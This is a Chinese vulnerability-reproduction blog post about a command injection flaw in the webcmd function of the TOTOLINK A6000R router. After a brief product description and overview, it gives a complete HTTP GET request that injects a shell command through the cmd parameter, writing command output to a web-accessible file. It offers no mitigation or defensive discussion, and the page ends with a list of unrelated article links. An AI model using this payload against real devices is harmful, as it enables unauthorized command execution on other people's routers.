当前位置: 首页 > news >正文

漏洞复现-路由器TOTOLINK-A6000R-RCE

news 来源:原创 2024/9/21 11:12:58

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://wwlib.cn/index.php/artread/artid/14996.html

0x01 产品简介

TOTOLINK A6000R是一款性能卓越的无线路由器,采用先进的技术和设计,为用户提供出色的网络体验。其支持最新的Wi-Fi标准,可实现高速稳定的无线连接,适用于各种网络需求,包括流畅的高清视频流、快速的在线游戏和大规模文件传输。双频段支持让用户可以根据需求选择最佳的无线信号频段,确保网络稳定性和速度。

0x02 漏洞概述

此设备中的webcmd函数中存在命令注入漏洞,攻击者可以通过webcmd 函数中的cmd参数包含命令,进行命令执行攻击。

0x03 复现环境

payload:

GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1
Host: 192.168.187.136
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=80c79bd6ad9bfba9656b7a8bee2a988f

图片

效果图:

图片

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 【vue2+elementui】记录el-upload文件上传时调接口传参的几种情况
  • python爬取某财富网
  • windows go grpc
  • 深入浅出大模型:LangChain详解——打造你的自定义Chain与异步API
  • 使用安卓手机安装Kali Linux
  • 基于微信小程序的高校大学生信息服务平台设计与实现
  • 未来不会使用 AI 的人真的会被淘汰吗?
  • iptables和firewalld的区别以及用法
  • 【Golang 面试 - 基础题】每日 5 题(七)
  • Python实战——轻松实现动态网页爬虫(附详细源码)
  • Python 如何创建和操作矩阵?
  • ffmpeg将视频转换成图片
  • 【全面介绍下Gitea,什么是Gitea?】
  • 敏捷产品经理实训:助力产品负责人掌握敏捷方法,提升产品开发效率
  • VB中如何操作数据库(使用ADO.NET连接和查询数据库)
  • [LeetCode] Wiggle Sort
  • 【个人向】《HTTP图解》阅后小结
  • - C#编程大幅提高OUTLOOK的邮件搜索能力!
  • DOM的那些事
  • java8-模拟hadoop
  • Java深入 - 深入理解Java集合
  • js正则,这点儿就够用了
  • Linux下的乱码问题
  • React+TypeScript入门
  • React系列之 Redux 架构模式
  • 关键词挖掘技术哪家强(一)基于node.js技术开发一个关键字查询工具
  • 基于 Ueditor 的现代化编辑器 Neditor 1.5.4 发布
  • 基于游标的分页接口实现
  • 基于组件的设计工作流与界面抽象
  • 前端性能优化——回流与重绘
  • 前端知识点整理(待续)
  • 深入浏览器事件循环的本质
  • 使用parted解决大于2T的磁盘分区
  • 使用SAX解析XML
  • 腾讯优测优分享 | Android碎片化问题小结——关于闪光灯的那些事儿
  • 微信小程序开发问题汇总
  • MPAndroidChart 教程:Y轴 YAxis
  • 带你开发类似Pokemon Go的AR游戏
  • ​Python 3 新特性:类型注解
  • # Maven错误Error executing Maven
  • #Datawhale X 李宏毅苹果书 AI夏令营#3.13.2局部极小值与鞍点批量和动量
  • #if等命令的学习
  • %check_box% in rails :coditions={:has_many , :through}
  • (02)Unity使用在线AI大模型(调用Python)
  • (1)Hilt的基本概念和使用
  • (2)(2.4) TerraRanger Tower/Tower EVO(360度)
  • (day6) 319. 灯泡开关
  • (Matalb时序预测)PSO-BP粒子群算法优化BP神经网络的多维时序回归预测
  • (Note)C++中的继承方式
  • (纯JS)图片裁剪
  • (免费领源码)python#django#mysql校园校园宿舍管理系统84831-计算机毕业设计项目选题推荐
  • (七)MySQL是如何将LRU链表的使用性能优化到极致的?
  • (四)事件系统
  • (一)80c52学习之旅-起始篇
  • (转)C#开发微信门户及应用(1)--开始使用微信接口